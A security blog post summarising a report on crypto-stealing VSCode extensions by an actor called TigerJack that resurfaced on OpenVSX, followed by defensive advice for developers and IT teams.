Crypto-Stealing VSCode Extensions Resurface—A Warning for Developers and Security Teams

October 15, 2025 Faeem BLOGS 0

A new report from Koi Security has revealed that malicious Visual Studio Code (VSCode) extensions—previously removed from Microsoft’s marketplace—have resurfaced on OpenVSX, a community-maintained registry used by VSCode-compatible editors like Cursor and Windsurf. The threat actor behind this campaign, known as TigerJack, is targeting developers with crypto miners, source code stealers, and dynamic backdoors.

As someone who’s worked extensively with infrastructure automation and secure development environments, this incident is a reminder that even trusted tools can become attack vectors when supply chain hygiene is neglected.

What’s Happening?

  • TigerJack has published at least 11 malicious extensions since early 2025.
  • Two known extensions—C++ Playground and HTTP Format—were removed from VSCode after 17,000 downloads but remain active on OpenVSX.
  • These extensions exfiltrate source code, mine cryptocurrency using host resources, and fetch remote JavaScript payloads for arbitrary code execution.

Why This Is Dangerous

1. Real-Time Code Theft

C++ Playground registers a listener that captures keystrokes and source code edits in near real-time, sending them to external endpoints.

2. Unrestricted Crypto Mining

HTTP Format secretly runs a CoinIMP miner, consuming full system resources without user consent.

3. Dynamic Payload Injection

Extensions like cppplayground, httpformat, and pythonformat poll a remote server every 20 minutes, allowing attackers to push new malicious code without updating the extension.

“TigerJack can dynamically push any malicious payload… stealing credentials, deploying ransomware, injecting backdoors, or monitoring activity in real-time.” – Koi Security

Strategic Takeaways for Developers and IT Teams

  • Vet your extensions. Only install packages from verified publishers with transparent GitHub histories and community trust.
  • Monitor extension behavior. Use endpoint detection tools to flag unusual resource usage or outbound traffic.
  • Segment developer environments. Treat dev machines as privileged assets—limit access, enforce MFA, and isolate them from production.
  • Educate your teams. Developers are often the first line of defense. Awareness of supply chain risks is essential.

Final Thoughts

This campaign is a sobering reminder that open-source ecosystems, while powerful, are vulnerable to abuse. As IT professionals, we must champion secure development practices, monitor third-party integrations, and treat every extension as a potential risk.

Be the first to comment

Leave a Reply

Your email address will not be published.


*


This site uses Akismet to reduce spam. Learn how your comment data is processed.